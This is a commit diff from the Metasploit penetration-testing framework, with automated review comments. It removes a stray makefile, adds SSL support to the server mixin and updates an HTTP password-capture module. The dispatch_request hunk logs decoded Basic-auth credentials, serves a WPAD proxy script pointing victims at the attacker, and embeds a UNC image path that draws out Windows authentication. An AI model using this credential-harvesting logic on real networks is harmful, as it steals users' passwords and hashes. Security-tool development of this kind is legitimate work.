Fixes #218. Updates the http password capture module. Removes a bogus makefile from the tree
git-svn-id: file:///home/svn/framework3/trunk@5452 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
8138c2259f
commit
1ea29ba8f0
|
@ -1,142 +0,0 @@
|
|||
|
||||
SHELL = /bin/sh
|
||||
|
||||
#### Start of system configuration section. ####
|
||||
|
||||
srcdir = .
|
||||
topdir = /usr/lib/ruby/1.8/i686-linux
|
||||
hdrdir = $(topdir)
|
||||
VPATH = $(srcdir):$(topdir):$(hdrdir)
|
||||
prefix = $(DESTDIR)/usr
|
||||
exec_prefix = $(DESTDIR)/usr
|
||||
sitedir = $(DESTDIR)/usr/lib/ruby/site_ruby
|
||||
rubylibdir = $(libdir)/ruby/$(ruby_version)
|
||||
archdir = $(rubylibdir)/$(arch)
|
||||
sbindir = $(exec_prefix)/sbin
|
||||
datadir = $(DESTDIR)/usr/share
|
||||
includedir = $(prefix)/include
|
||||
infodir = $(DESTDIR)/usr/share/info
|
||||
sysconfdir = $(DESTDIR)/etc
|
||||
mandir = $(DESTDIR)/usr/share/man
|
||||
libdir = $(DESTDIR)/usr/lib
|
||||
sharedstatedir = $(prefix)/com
|
||||
oldincludedir = $(DESTDIR)/usr/include
|
||||
sitearchdir = $(sitelibdir)/$(sitearch)
|
||||
bindir = $(exec_prefix)/bin
|
||||
localstatedir = $(DESTDIR)/var/lib
|
||||
sitelibdir = $(sitedir)/$(ruby_version)
|
||||
libexecdir = $(exec_prefix)/libexec
|
||||
|
||||
CC = i686-pc-linux-gnu-gcc
|
||||
LIBRUBY = $(LIBRUBY_SO)
|
||||
LIBRUBY_A = lib$(RUBY_SO_NAME)-static.a
|
||||
LIBRUBYARG_SHARED = -Wl,-R -Wl,$(libdir) -L$(libdir) -L. -l$(RUBY_SO_NAME)
|
||||
LIBRUBYARG_STATIC = -l$(RUBY_SO_NAME)-static
|
||||
|
||||
RUBY_EXTCONF_H =
|
||||
CFLAGS = -fPIC -O2 -march=pentium4 -fPIC
|
||||
INCFLAGS = -I. -I. -I/usr/lib/ruby/1.8/i686-linux -I.
|
||||
CPPFLAGS =
|
||||
CXXFLAGS = $(CFLAGS)
|
||||
DLDFLAGS =
|
||||
LDSHARED = $(CC) -shared
|
||||
AR = i686-pc-linux-gnu-ar
|
||||
EXEEXT =
|
||||
|
||||
RUBY_INSTALL_NAME = ruby18
|
||||
RUBY_SO_NAME = ruby18
|
||||
arch = i686-linux
|
||||
sitearch = i686-linux
|
||||
ruby_version = 1.8
|
||||
ruby = /usr/bin/ruby18
|
||||
RUBY = $(ruby)
|
||||
RM = rm -f
|
||||
MAKEDIRS = mkdir -p
|
||||
INSTALL = /bin/install -c
|
||||
INSTALL_PROG = $(INSTALL) -m 0755
|
||||
INSTALL_DATA = $(INSTALL) -m 644
|
||||
COPY = cp
|
||||
|
||||
#### End of system configuration section. ####
|
||||
|
||||
preload =
|
||||
|
||||
libpath = $(libdir)
|
||||
LIBPATH = -L'$(libdir)' -Wl,-R'$(libdir)'
|
||||
DEFFILE =
|
||||
|
||||
CLEANFILES =
|
||||
DISTCLEANFILES =
|
||||
|
||||
extout =
|
||||
extout_prefix =
|
||||
target_prefix =
|
||||
LOCAL_LIBS =
|
||||
LIBS = $(LIBRUBYARG_SHARED) -lorcon -ldl -lcrypt -lm -lc
|
||||
SRCS = Lorcon.c
|
||||
OBJS = Lorcon.o
|
||||
TARGET = Lorcon
|
||||
DLLIB = $(TARGET).so
|
||||
EXTSTATIC =
|
||||
STATIC_LIB =
|
||||
|
||||
RUBYCOMMONDIR = $(sitedir)$(target_prefix)
|
||||
RUBYLIBDIR = $(sitelibdir)$(target_prefix)
|
||||
RUBYARCHDIR = $(sitearchdir)$(target_prefix)
|
||||
|
||||
TARGET_SO = $(DLLIB)
|
||||
CLEANLIBS = $(TARGET).so $(TARGET).il? $(TARGET).tds $(TARGET).map
|
||||
CLEANOBJS = *.o *.a *.s[ol] *.pdb *.exp *.bak
|
||||
|
||||
all: $(DLLIB)
|
||||
static: $(STATIC_LIB)
|
||||
|
||||
clean:
|
||||
@-$(RM) $(CLEANLIBS) $(CLEANOBJS) $(CLEANFILES)
|
||||
|
||||
distclean: clean
|
||||
@-$(RM) Makefile $(RUBY_EXTCONF_H) conftest.* mkmf.log
|
||||
@-$(RM) core ruby$(EXEEXT) *~ $(DISTCLEANFILES)
|
||||
|
||||
realclean: distclean
|
||||
install: install-so install-rb
|
||||
|
||||
install-so: $(RUBYARCHDIR)
|
||||
install-so: $(RUBYARCHDIR)/$(DLLIB)
|
||||
$(RUBYARCHDIR)/$(DLLIB): $(DLLIB)
|
||||
$(INSTALL_PROG) $(DLLIB) $(RUBYARCHDIR)
|
||||
install-rb: pre-install-rb install-rb-default
|
||||
install-rb-default: pre-install-rb-default
|
||||
pre-install-rb: Makefile
|
||||
pre-install-rb-default: Makefile
|
||||
$(RUBYARCHDIR):
|
||||
$(MAKEDIRS) $@
|
||||
|
||||
site-install: site-install-so site-install-rb
|
||||
site-install-so: install-so
|
||||
site-install-rb: install-rb
|
||||
|
||||
.SUFFIXES: .c .m .cc .cxx .cpp .C .o
|
||||
|
||||
.cc.o:
|
||||
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
|
||||
|
||||
.cxx.o:
|
||||
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
|
||||
|
||||
.cpp.o:
|
||||
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
|
||||
|
||||
.C.o:
|
||||
$(CXX) $(INCFLAGS) $(CPPFLAGS) $(CXXFLAGS) -c $<
|
||||
|
||||
.c.o:
|
||||
$(CC) $(INCFLAGS) $(CPPFLAGS) $(CFLAGS) -c $<
|
||||
|
||||
$(DLLIB): $(OBJS)
|
||||
@-$(RM) $@
|
||||
$(LDSHARED) $(DLDFLAGS) $(LIBPATH) -o $@ $(OBJS) $(LOCAL_LIBS) $(LIBS)
|
||||
|
||||
|
||||
|
||||
$(OBJS): ruby.h defines.h
|
|
@ -251,8 +251,9 @@ module Exploit::Remote::TcpServer
|
|||
|
||||
register_options(
|
||||
[
|
||||
Opt::SSL,
|
||||
OptAddress.new('SRVHOST', [ true, "The local host to listen on.", '0.0.0.0' ]),
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ])
|
||||
OptPort.new('SRVPORT', [ true, "The local port to listen on.", 8080 ]),
|
||||
], Msf::Exploit::Remote::TcpServer)
|
||||
|
||||
register_evasion_options(
|
||||
|
@ -309,6 +310,7 @@ module Exploit::Remote::TcpServer
|
|||
self.service = Rex::Socket::TcpServer.create(
|
||||
'LocalHost' => srvhost,
|
||||
'LocalPort' => srvport,
|
||||
'SSL' => ssl,
|
||||
'Context' =>
|
||||
{
|
||||
'Msf' => framework,
|
||||
|
@ -389,6 +391,14 @@ module Exploit::Remote::TcpServer
|
|||
datastore['SRVPORT']
|
||||
end
|
||||
|
||||
#
|
||||
# Returns the SSL option
|
||||
#
|
||||
def ssl
|
||||
datastore['SSL']
|
||||
end
|
||||
|
||||
|
||||
#
|
||||
# Re-generates the payload, substituting the current RHOST and RPORT with
|
||||
# the supplied client host and port from the socket.
|
||||
|
|
|
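Review bot: The comment on the new `ssl` accessor, `# Returns the SSL option`, does not say what the option means for a listener. From the `'SSL' => ssl` entry now passed to `Rex::Socket::TcpServer.create`, it appears to switch the server socket to SSL, and the SslTcpServer changes in this same commit suggest the certificate is generated at runtime with a validity window of a few hours. I would say so in the comment, e.g. `# Returns true when accepted connections should be wrapped in SSL (datastore['SSL'])`. If the shared `Opt::SSL` description is worded for outgoing connections, a server-side description would be clearer. The hunks are excerpts, so the surrounding methods start and end outside them.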
@ -25,19 +25,23 @@ module Rex::Socket::SslTcpServer
|
|||
|
||||
def accept(opts = {})
|
||||
sock = super()
|
||||
if (sock)
|
||||
sock.extend(Rex::Socket::Tcp)
|
||||
sock.context = self.context
|
||||
pn = sock.getpeername
|
||||
return nil if not sock
|
||||
|
||||
sock.extend(Rex::Socket::Tcp)
|
||||
sock.context = self.context
|
||||
pn = sock.getpeername
|
||||
|
||||
sock.peerhost = pn[1]
|
||||
sock.peerport = pn[2]
|
||||
end
|
||||
t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
|
||||
t.extend(Rex::Socket::Tcp)
|
||||
t.accept
|
||||
|
||||
t
|
||||
begin
|
||||
t = OpenSSL::SSL::SSLSocket.new(sock, self.sslctx)
|
||||
t.extend(Rex::Socket::Tcp)
|
||||
t.peerhost = pn[1]
|
||||
t.peerport = pn[2]
|
||||
t.accept
|
||||
t
|
||||
rescue ::OpenSSL::SSL::SSLError
|
||||
sock.close
|
||||
nil
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
|
@ -65,8 +69,8 @@ module Rex::Socket::SslTcpServer
|
|||
|
||||
cert.subject = subject
|
||||
cert.issuer = issuer
|
||||
cert.not_before = Time.now
|
||||
cert.not_after = Time.now + 3600
|
||||
cert.not_before = Time.now - 7200
|
||||
cert.not_after = Time.now + 7200
|
||||
cert.public_key = key.public_key
|
||||
ef = OpenSSL::X509::ExtensionFactory.new(nil,cert)
|
||||
cert.extensions = [
|
||||
|
|
|
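Review bot: In `accept`, the new `rescue ::OpenSSL::SSL::SSLError` covers only TLS-level failures; a peer that resets or closes the connection mid-handshake can make `t.accept` raise a socket error or `EOFError` instead, which skips `sock.close` and propagates to the caller. Widening it to `rescue ::OpenSSL::SSL::SSLError, ::SystemCallError, ::EOFError` keeps the close-and-return-nil path for those cases. The handshake also runs synchronously inside `accept` with no timeout visible here, so a client that connects and then sends nothing may stall the listener unless the caller bounds the wait. In the certificate hunk, `Time.now - 7200` for `not_before` looks like clock-skew tolerance and would benefit from a one-line comment saying so.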
@ -53,6 +53,8 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def run
|
||||
@myhost = datastore['SRVHOST']
|
||||
@myport = datastore['SRVPORT']
|
||||
exploit()
|
||||
end
|
||||
|
||||
|
@ -91,27 +93,30 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def dispatch_request(cli, req)
|
||||
|
||||
|
||||
mysrc = Rex::Socket.source_address(cli.peerhost)
|
||||
hhead = (req['Host'] || @myhost).split(':', 2)[0]
|
||||
|
||||
if(req['Authorization'] and req['Authorization'] =~ /basic/i)
|
||||
basic,auth = req['Authorization'].split(/\s+/)
|
||||
user,pass = Rex::Text.decode_base64(auth).split(':', 2)
|
||||
report_auth_info(
|
||||
:host => cli.peerhost,
|
||||
:proto => 'http',
|
||||
:targ_host => req['Host'] || datastore['SRVHOST'],
|
||||
:targ_port => datastore['SRVPORT'],
|
||||
:targ_host => hhead,
|
||||
:targ_port => @myport,
|
||||
:user => user,
|
||||
:pass => pass,
|
||||
:extra => req.resource.to_s
|
||||
)
|
||||
print_status("HTTP LOGIN #{req['Host']}:#{datastore['SRVPORT']} #{user} / #{pass} => #{req.resource}")
|
||||
print_status("HTTP LOGIN #{cli.peerhost} > #{hhead}:#{@myport} #{user} / #{pass} => #{req.resource}")
|
||||
end
|
||||
|
||||
if(req.resource =~ /^wpad.dat|.*\.pac$/i)
|
||||
prx = "function FindProxyForURL(url, host) { return 'PROXY #{Rex::Socket.source_address(cli.peerhost)}:#{datastore['SRVPORT']}'; }"
|
||||
prx = "function FindProxyForURL(url, host) { return 'PROXY #{mysrc}:#{@myport}'; }"
|
||||
res =
|
||||
"HTTP/1.1 200 OK\r\n" +
|
||||
"Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +
|
||||
"Host: #{hhead}\r\n" +
|
||||
"Content-Type: application/x-ns-proxy-autoconfig\r\n" +
|
||||
"Content-Length: #{prx.length}\r\n" +
|
||||
"Connection: Close\r\n\r\n#{prx}"
|
||||
|
@ -120,9 +125,9 @@ class Auxiliary::Server::Capture::HTTP < Msf::Auxiliary
|
|||
return
|
||||
end
|
||||
|
||||
print_status("HTTP REQUEST #{req['Host']}:#{datastore['SRVPORT']} #{req.resource}")
|
||||
print_status("HTTP REQUEST #{cli.peerhost} > #{hhead}:#{@myport} #{req.method} #{req.resource}")
|
||||
|
||||
data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{Rex::Socket.source_address(cli.peerhost)}\\public\\loading.jpg' width='1' height='1'></body></html>"
|
||||
data = "<html><head><title>Connecting...</title></head><body><img src='\\\\#{mysrc}\\public\\loading.jpg' width='1' height='1'></body></html>"
|
||||
res =
|
||||
"HTTP/1.1 200 OK\r\n" +
|
||||
"Host: #{req['Host'] || datastore['SRVHOST']}\r\n" +
|
||||
|
|
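Review bot: In `dispatch_request`, the new `hhead` is derived from the client-supplied `Host` header and, like `user`, `pass`, `req.method` and `req.resource`, is interpolated unfiltered into `print_status`, `report_auth_info` and the response `Host:` line. Control or escape characters from the peer therefore reach the operator's console and the stored record. Stripping non-printables once at the point of capture would contain that, e.g. `hhead = (req['Host'] || @myhost).to_s.gsub(/[^\x20-\x7e]/, '').split(':', 2)[0]`, with the same filter applied to the other logged fields. Separately, `split(':', 2)[0]` yields `nil` for an empty `Host` value and `"["` for a bracketed IPv6 literal, so a fallback to `@myhost` when the result is empty would be safer. The method body continues outside these hunks.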